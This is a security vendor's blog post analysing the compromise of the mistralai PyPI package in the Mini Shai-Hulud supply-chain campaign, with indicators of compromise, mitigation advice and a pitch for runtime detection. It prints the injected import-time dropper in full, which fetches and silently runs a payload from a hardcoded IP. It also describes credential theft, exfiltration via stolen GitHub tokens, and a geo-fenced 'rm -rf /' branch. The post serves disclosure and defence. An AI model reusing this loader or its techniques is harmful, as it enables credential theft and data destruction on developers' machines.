The recent compromise of the mistralai PyPI package shows why runtime protection is needed.

Developers working with large language models often run code with elevated privileges, access sensitive API keys, and operate in environments where security tooling is sparse.

Microsoft Threat Intelligence confirmed on May 12, 2026 that mistralai PyPI package v2.4.6 had been compromised as part of the Mini Shai-Hulud supply chain campaign. The campaign entry point has been assigned CVE-2026-45321 (CVSS 9.6).

The compromise is part of a broader coordinated campaign. Researchers at SafeDep, StepSecurity, Socket, and Snyk are tracking it as Mini Shai-Hulud - more detail below.

The Bigger Picture - The Mini Shai-Hulud Campaign

The Mistral AI PyPI compromise did not happen in isolation.

Between May 11 and 12, 2026, threat actors published over 400 malicious versions of 170 packages across npm and PyPI. The campaign is tracked as Mini Shai-Hulud by SafeDep, StepSecurity, Socket, Endor Labs, and Wiz, and is attributed to a group known as TeamPCP - described by Wiz as 'a financially motivated threat actor specializing in cloud-native infrastructure compromise, first tracked in late 2025.'

Other affected projects include TanStack, UiPath, OpenSearch, Squawk, and Guardrails AI. The Mistral PyPI packages used a separate payload mechanism - a Python dropper executing on import - distinct from the npm worm vector.



The campaign name comes from attacker-controlled GitHub repositories created with stolen tokens, all described with 'Shai-Hulud: Here We Go Again,' a reference to Frank Herbert's Dune. This is the fourth documented wave of the worm, active since September 2025 (Snyk, May 2026).

How the Attack Works

The attackers injected malicious code directly into the official package, in `mistralai/client/__init__.py`. That file runs the moment anyone imports the Mistral client library. No special function call is required. No user interaction is needed. Just `import mistralai` is enough to trigger execution.

The injected code is deceptively simple: it downloads the payload from `https://83.142.209.194/transformers.pyz` and immediately executes it. The filename choice is deliberate: "transformers.pyz" is designed to blend into ML development environments where the Hugging Face Transformers library is ubiquitous. A file with that name sitting in `/tmp` would not immediately raise suspicion during casual inspection.

The use of `start_new_session=True` detaches the malicious process from the parent, making it harder to trace back to the import. Redirecting stdout and stderr to `DEVNULL` ensures no error messages or output leak to the console. Every detail is designed to minimize detection in the supply chain attack.

```python
import subprocess as _sub
import os as _os

# Note: _sys is referenced below, but its import is not shown in this excerpt.

def _run_background_task():
    if not _sys.platform.startswith("linux") or _os.environ.get("MISTRAL_INIT"):
        return
    _os.environ["MISTRAL_INIT"] = "1"
    _url = "https://83.142.209.194/transformers.pyz"
    _dest = "/tmp/transformers.pyz"
    try:
        if not _os.path.exists(_dest):
            _sub.run(["curl", "-k", "-L", "-s", _url, "-o", _dest], timeout=15)
        if _os.path.exists(_dest):
            _sub.Popen(
                [_sys.executable, _dest],
                stdout=_sub.DEVNULL, stderr=_sub.DEVNULL,
                start_new_session=True, env=_os.environ.copy()
            )
    except:
        pass

_run_background_task() # Executes on import
```

This effectively does the following:

- Downloads the transformers.pyz

- Opens the ZIP archive

- Finds __main__.py

- Executes that file as the program entrypoint


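A `.pyz` file is an ordinary ZIP archive that the Python interpreter runs by locating `__main__.py` inside it. The sketch below shows one way an analyst could list the members of such an archive without executing anything. It builds a harmless demo archive in memory; the helper names `build_demo_pyz` and `inspect_pyz` are hypothetical and are not taken from the public analysis.

```python
import io
import zipfile


def build_demo_pyz() -> bytes:
    """Build a tiny, harmless .pyz-style archive in memory for demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("__main__.py", "print('hello from __main__')\n")
        zf.writestr("helper.py", "VALUE = 1\n")
    return buf.getvalue()


def inspect_pyz(data: bytes) -> dict:
    """List archive members and report whether an entrypoint exists.

    Nothing is executed: the archive is only opened and read.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = zf.namelist()
    return {"members": members, "has_entrypoint": "__main__.py" in members}


report = inspect_pyz(build_demo_pyz())
print(report)
```

Reading a suspicious archive this way, ideally on an isolated analysis host, reveals its structure while avoiding the `python file.pyz` step that would run the entrypoint.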

The __main__.py then performs the following:



1. Ensures it’s running in a “real” Linux environment



2. Avoids Russian-language systems



3. Avoids Israeli systems



4. Installs the cryptography package if missing

5. Silently launches the real payload from entrypoint

entrypoint.py is the credential stealer/exfiltration payload, which performs the following:



1. Collects credentials: The real harvesting logic is in `aggregate.py`, which likely gathers tokens, secrets, configs, and SSH, GitHub, and cloud credentials. The payload invokes it with `from aggregate import collect_all` followed by `results = collect_all()`.



It tries to collect credentials from a number of providers, which we summarize in the table below.



2. Encrypts stolen data by calling `_build_package(results)`.





3. Exfiltrates data: It first sends the encrypted package to `config.TARGET_URL` via an HTTP POST request. If that fails, it tries to discover a backup “mothership” URL through GitHub commit search:



4. Fallback exfiltration: If direct exfiltration fails, it searches the stolen data for GitHub tokens. It then uses a stolen GitHub token to create a repository with a random-looking name, base64-encodes the encrypted data, and uploads it there.

But the initial loader is just the delivery mechanism. The real payload is what makes this incident stand out.

According to the public analysis, the downloaded `transformers.pyz` is a credential stealer with several unusual characteristics. It contains country-aware logic that causes it to avoid execution in Russian-language environments entirely. More disturbing is a geo-fenced destructive branch: when the system appears to be located in Israel or Iran, the malware has a 1-in-6 probability of executing `rm -rf /`, a command that recursively deletes the entire filesystem.

That is not credential theft. That is sabotage.



The payload also establishes persistence through artifacts like `pgmonitor.py` and `pgsql-monitor.service`, names chosen to look like legitimate PostgreSQL monitoring components. Again, the pattern is clear: every naming choice is designed to avoid triggering suspicion during manual review or automated scanning.

The targeting here matters. This was not a random package. Mistral is one of the leading providers of open-weight large language models. Developers using the Mistral AI SDK are often working on AI applications, have access to expensive API credentials, and may be running experiments on GPU-equipped machines with broad network access. Compromising this supply chain gives attackers a foothold into exactly the kind of high-value development environments that traditional malware campaigns struggle to reach.

The attack surface is also different from typical npm or PyPI compromises. ML developers frequently install packages in Jupyter notebooks, on cloud VMs with production credentials, or in CI/CD pipelines that deploy to inference endpoints. A single `pip install mistralai` in the wrong place could compromise an entire model serving infrastructure.

Indicators of Compromise

File system:

- /tmp/transformers.pyz

- pgmonitor.py

- pgsql-monitor.service

Network:

- Outbound connections to 83.142.209.194

- curl subprocess spawned from a Python interpreter

Environment:

- MISTRAL_INIT environment variable set unexpectedly

For mitigation steps, follow Microsoft Threat Intelligence guidance: isolate affected hosts, block 83.142.209.194, and rotate all credentials on any host that imported mistralai v2.4.6.
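The indicators listed above can be checked with a short script. The following is a minimal sketch, not an official detection tool: the function name `check_host_iocs`, the choice of search roots, and the idea of passing in the environment mapping to inspect are all assumptions made for illustration. The demonstration runs against a throwaway directory that simulates an affected host, so it does not touch the real filesystem.

```python
import os
import tempfile
from pathlib import Path

# Indicator names taken from the list above.
PERSISTENCE_FILENAMES = {"pgmonitor.py", "pgsql-monitor.service"}
DROPPER_NAME = "transformers.pyz"
MARKER_ENV_VAR = "MISTRAL_INIT"


def check_host_iocs(env, tmp_dir, search_roots):
    """Return human-readable findings for the file and environment indicators.

    env          -- mapping of environment variables to inspect
    tmp_dir      -- directory where the dropper would be written (/tmp on a real host)
    search_roots -- directories to walk for persistence artifacts (an assumption;
                    the source does not say where these files are placed)
    """
    findings = []
    if MARKER_ENV_VAR in env:
        findings.append(f"environment variable {MARKER_ENV_VAR} is set")
    dropper = Path(tmp_dir) / DROPPER_NAME
    if dropper.exists():
        findings.append(f"dropper file present: {dropper}")
    for root in search_roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                if name in PERSISTENCE_FILENAMES:
                    findings.append(f"persistence artifact present: {Path(dirpath) / name}")
    return findings


# Demonstration against a temporary directory that simulates a host.
with tempfile.TemporaryDirectory() as fake_host:
    clean = check_host_iocs({}, fake_host, [fake_host])
    Path(fake_host, DROPPER_NAME).write_bytes(b"")
    Path(fake_host, "pgmonitor.py").write_text("")
    dirty = check_host_iocs({MARKER_ENV_VAR: "1"}, fake_host, [fake_host])

print(clean)
print(len(dirty))
```

On a real host, one would pass `/tmp` as `tmp_dir` and a set of directories chosen by the responder as `search_roots`. A clean result does not prove the host is unaffected, since the payload may have removed its own artifacts.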

Why Scanners and SCA Tools Did Not Catch This

The mistralai package v2.4.6 was published from the official maintainer account. It passed integrity checks. No CVE existed at the time of deployment.

What SCA Tools Reported

A standard SCA scan would have returned: mistralai v2.4.6 installed, no known vulnerabilities. The CVE was only assigned after the attack was discovered. At the time the malicious version was available for download, no scanner had anything to flag.

What Vulnerability Scanners Reported

No entry existed in CVE databases when the malicious version was live. Any tool comparing installed packages against known-bad signatures returned nothing.
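The timing problem can be illustrated with a toy model of a known-bad lookup. This is a simplified sketch, not how any particular SCA product works: the function `flag_known_bad`, the advisory dictionaries, and the second package entry are hypothetical.

```python
def flag_known_bad(installed: dict, advisories: dict) -> list:
    """Return 'name==version' strings for installed packages listed in advisories."""
    return sorted(
        f"{name}=={version}"
        for name, version in installed.items()
        if version in advisories.get(name, set())
    )


# Hypothetical inventory of an affected environment.
installed = {"mistralai": "2.4.6", "examplepkg": "1.0.0"}

# While the malicious version was live, no advisory existed yet.
advisories_before_disclosure = {}
# After disclosure, the same lookup has something to match against.
advisories_after_disclosure = {"mistralai": {"2.4.6"}}

print(flag_known_bad(installed, advisories_before_disclosure))
print(flag_known_bad(installed, advisories_after_disclosure))
```

The scanner logic is identical in both calls. Only the advisory data changes, which is why the first call has nothing to report.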

The Fundamental Limitation

Even cryptographic provenance verification - designed to confirm a package was built from a trusted source - cannot tell you what the package does at runtime. A package can pass every pre-deployment check and still execute malicious code the moment it is imported.
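A toy digest check makes the same point. In this sketch, which uses hypothetical names and a placeholder byte string in place of a real package, the published digest is computed over whatever was uploaded, so a malicious upload verifies just as cleanly as a benign one.

```python
import hashlib


def verify_digest(artifact: bytes, published_sha256: str) -> bool:
    """Confirm the downloaded bytes match the digest published by the registry."""
    return hashlib.sha256(artifact).hexdigest() == published_sha256


# Placeholder standing in for a package that contains injected code.
uploaded_artifact = b"# package contents, including an injected import-time hook\n"

# The registry hashes exactly what the publishing account uploaded.
published_digest = hashlib.sha256(uploaded_artifact).hexdigest()

print(verify_digest(uploaded_artifact, published_digest))
```

The check answers "are these the bytes that were published?" and says nothing about what those bytes do once imported.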

The only layer that had a chance to catch this attack is runtime observability.

Why Raven Solves This

What this incident ultimately reinforces is the importance of runtime visibility.

The Mistral AI compromise, and the broader Mini Shai-Hulud campaign it is part of, are a concrete demonstration of why runtime visibility is not optional. When every pre-deployment control returns clean results - no CVE, no scanner alert, no integrity check failure - the runtime layer is the only place where the attack becomes visible.

A package scanner can tell you that mistralai 2.4.6 was installed. A dependency auditor might flag a known-bad version. But once the malicious code executes, the decisive question becomes behavioral: what is it actually doing?

That is where runtime ADR becomes essential. The moment that `_run_background_task()` fires, the malware has to reveal itself through observable actions:

- A curl process spawning from a Python interpreter

- An outbound HTTPS connection to the bare IP address 83.142.209.194, made with certificate verification disabled (`curl -k`)

- A new file appearing in /tmp with a .pyz extension

- A Python process executing that file in a detached session

- Subsequent persistence mechanisms creating files like pgmonitor.py

These are the signals Raven Runtime ADR is built to capture. At the moment `_run_background_task()` fires, Raven sees the subprocess spawn, the outbound connection, the file write to `/tmp`, and the detached execution chain. Each signal individually could be noise. In sequence, triggered by a package import, they form a pattern with no legitimate explanation in a production environment.

None of these actions are hidden. They cannot be. The malware must interact with the operating system to accomplish its goals, and those interactions produce signals. The challenge is whether defenders have the instrumentation to capture those signals and the context to understand what they mean.

A process spawning curl to download an executable is not inherently malicious. A Python script writing to /tmp is common. But a Python import triggering an immediate download-and-execute sequence from a hardcoded IP address, with error suppression and session detachment, is a pattern that should never occur in legitimate application behavior.
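The difference between isolated signals and a correlated chain can be sketched in a few lines. This is an illustration only and does not represent Raven's detection logic: the `Event` record, its field names, and the matching rules are assumptions chosen to mirror the sequence described above.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    kind: str               # "spawn", "connect", "write", or "exec"
    actor: str              # name of the process performing the action
    target: str             # child process, remote host, or file path
    detached: bool = False  # True if the executed process runs in a new session


def _is_bare_ip(host: str) -> bool:
    """Return True when the remote host is a literal IP address, not a hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def matches_download_and_execute(events) -> bool:
    """Detect, in order: Python spawns curl, curl connects to a bare IP,
    curl writes a file under /tmp, Python executes that file detached."""
    stage, written = 0, None
    for ev in events:
        if stage == 0 and ev.kind == "spawn" and ev.actor.startswith("python") and ev.target == "curl":
            stage = 1
        elif stage == 1 and ev.kind == "connect" and ev.actor == "curl" and _is_bare_ip(ev.target):
            stage = 2
        elif stage == 2 and ev.kind == "write" and ev.actor == "curl" and ev.target.startswith("/tmp/"):
            stage, written = 3, ev.target
        elif (stage == 3 and ev.kind == "exec" and ev.actor.startswith("python")
              and ev.target == written and ev.detached):
            return True
    return False


attack_chain = [
    Event("spawn", "python3", "curl"),
    Event("connect", "curl", "83.142.209.194"),
    Event("write", "curl", "/tmp/transformers.pyz"),
    Event("exec", "python3", "/tmp/transformers.pyz", detached=True),
]
benign_activity = [
    Event("spawn", "python3", "curl"),
    Event("connect", "curl", "pypi.org"),
]

print(matches_download_and_execute(attack_chain))
print(matches_download_and_execute(benign_activity))
```

No single event in `attack_chain` triggers a match on its own. The function only returns `True` when all four occur in order, which reflects the point that context, not any individual action, is what separates this behavior from normal activity.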

Incidents like this are a reminder that the software supply chain is no longer just a packaging problem. It is also a runtime problem, because sooner or later malicious code has to act. And when it does, the ability to observe and understand runtime behavior is what gives defenders a chance to respond before credentials are stolen, before persistence is established, and before `rm -rf /` turns a compromised machine into an unrecoverable loss.
